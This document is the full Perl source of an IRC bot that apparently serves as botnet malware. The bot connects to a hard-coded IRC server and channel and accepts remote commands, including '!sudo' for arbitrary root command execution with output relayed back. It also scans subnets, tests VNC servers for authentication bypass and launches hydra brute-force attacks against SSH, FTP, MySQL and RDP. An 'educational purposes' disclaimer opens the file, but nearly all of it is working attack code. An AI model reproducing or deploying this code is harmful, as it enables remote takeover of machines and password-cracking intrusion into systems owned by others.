IRC Bot (perl) by independent

#For educational purposes or for use on your network only
#This script has been modified from the original source.
#Thanks to the real owner of it.
#Get on my IRC Network if you need explainations on how you can use this script.


use IO::Socket;
use IO::Socket::INET;
use threads;
use threads::shared;
use Errno qw(EAGAIN);
use warnings;
my $lines;
our @results : shared;
our $todo = 0;
our $contatore = 0;
my $orig_thread = "yes";
my $start;
my $end;
my $out_file;
my $range = 99999;
my $random_number = int(rand($range));
my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;
my @hydra_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
my $splits = 8; # Creates 2^N processes.
our $subnet;
my $nick = "b0t$random_number";# nick
my $secureport = "6667";
my $ircnet = "irc-1.iownyour.biz";
my $canale = "#powercc";
my $answer;
my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "USER $nick 0 * :Robot made by independent \r\n";
print $sk "NICK $nick \r\n";

 while ($answer = <$sk>) {

    if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
    {

        print $sk "PONG ".$1."\r\n";
        print $sk "JOIN $canale \r\n";
    }
    if ($answer=~ /!help/) {
    printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  }
  if ($answer=~ /!list/)
  {

    my $file = 'xploits.log';
    open my $fh, '<', $file or warn "Could not open '$file' $!\n";

    while (my $lines = <$fh>) {
      chomp $lines;
      if ($lines=~ /host/) {
        printa("$lines");
      }
    }
  }
  if ($answer=~ /!reload/)
  {
    printa("Reloading...");
    my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
    system(@cmd);
  }
  if ($answer=~ /!die/)
  {
    printa("Dying...");
    my @cmd = ("sudo pkill perl && sudo pkill hydra");
    system(@cmd);
  }
  if ($answer=~ /!sudo\s+(.*)/)
  {
        my $command = $1;
        printa("Done: $command ");
    my $cmd = "sudo $command";
    my @output = `$cmd 2>&1 3>&1`;
    foreach(@output) {
      printa("$_\r\n");
    }
  }


  if ($answer=~ /!scan (.+)/)
  {


    $todo = 0;
    $subnet = $1;
    if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
      $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
      $subnet .= ".";
      printa("Scanning subnet ${subnet}x\n");

      CHECK: {
        unless ($splits >= 0 && $splits <= 8) {
          die "ERROR: Do not split $splits times--that makes no sense.\n";
        }
      }

      # Ugly, but this works.
      DivideWork() if $splits >= 1;
      DivideWork() if $splits >= 2;
      DivideWork() if $splits >= 3;
      DivideWork() if $splits >= 4;
      DivideWork() if $splits >= 5;
      DivideWork() if $splits >= 6;
      DivideWork() if $splits >= 7;
      DivideWork() if $splits >= 8;

      $start = $todo << (8 - $splits);
      $end = $start + (256 / (2**$splits)) - 1;

      foreach ($start .. $end) {

        Scan_ALL($_);

      }
     }

   else {
      printa("Are you brain-dead? Use a correct IP format. ");
    }

  }

}
  ####################################

  sub DivideWork {
    my $pid;

    FORK: {
      $todo *= 2;
      if ($pid = fork) {
        # Parent
        ++$todo;

        } elsif (defined $pid) {
        # Child
        $orig_thread = "no";

        } elsif ($! == EAGAIN) {
        # Recoverable forking error.
        sleep 7;
        redo FORK;

        } else {
        # Unable to fork.
        printa("Unable to fork: $!\n");

      }
    }
  }


  sub Scan_ALL {
    my $hostnum = shift;
    my $host = $subnet . $hostnum;
    my $sock;
    my $proto_ver;
    my $ignored;
    my $auth_type;
    my $sec_types;
    my $vnc_data;
    $host or printa("ERROR: missing Host IP address Scan_ALL.");

    # The host numbers .0 and .255 are reserved; ignore them.
    if ($hostnum <= 0 or $hostnum >= 255) { return; }

    # Format things nicely--that crazy formula just adds spaces.
    $results[$hostnum] = "$host";
    $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
    foreach my $porti (@VNC_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {

        $sock->read($proto_ver, 12);
        print $sock $proto_ver;

        # Get supported security types and ignore them.
        $sock->read($sec_types, 1);

        $sock->read($ignored, unpack('C', $sec_types));
        # Claim that we only support no authentication.
        print $sock "\x01";


        # We should get "0000" back, indicating that they won't fall back to no authentication.
        $sock->read($auth_type, 4);

        # Client initialize.
        print $sock "\x01";

        # If the server starts sending data, we're in.
        $sock->read($vnc_data, 4);
        printa("[Xploiting VNC] $host");
        if (unpack('I', $vnc_data)) {
          $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
          printa("9,3 [ $porti ] $results[$hostnum] $porti ");
        }
      }
    }
    foreach my $porti (@hydra_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
        close($sock);
        printa("[Cracking " . $porti->[1] . "] $host");
        my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
        system(@cmdhydra);
        return;
      }
    }

    close($sock);
    return;
  }

  sub printa {
    print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  }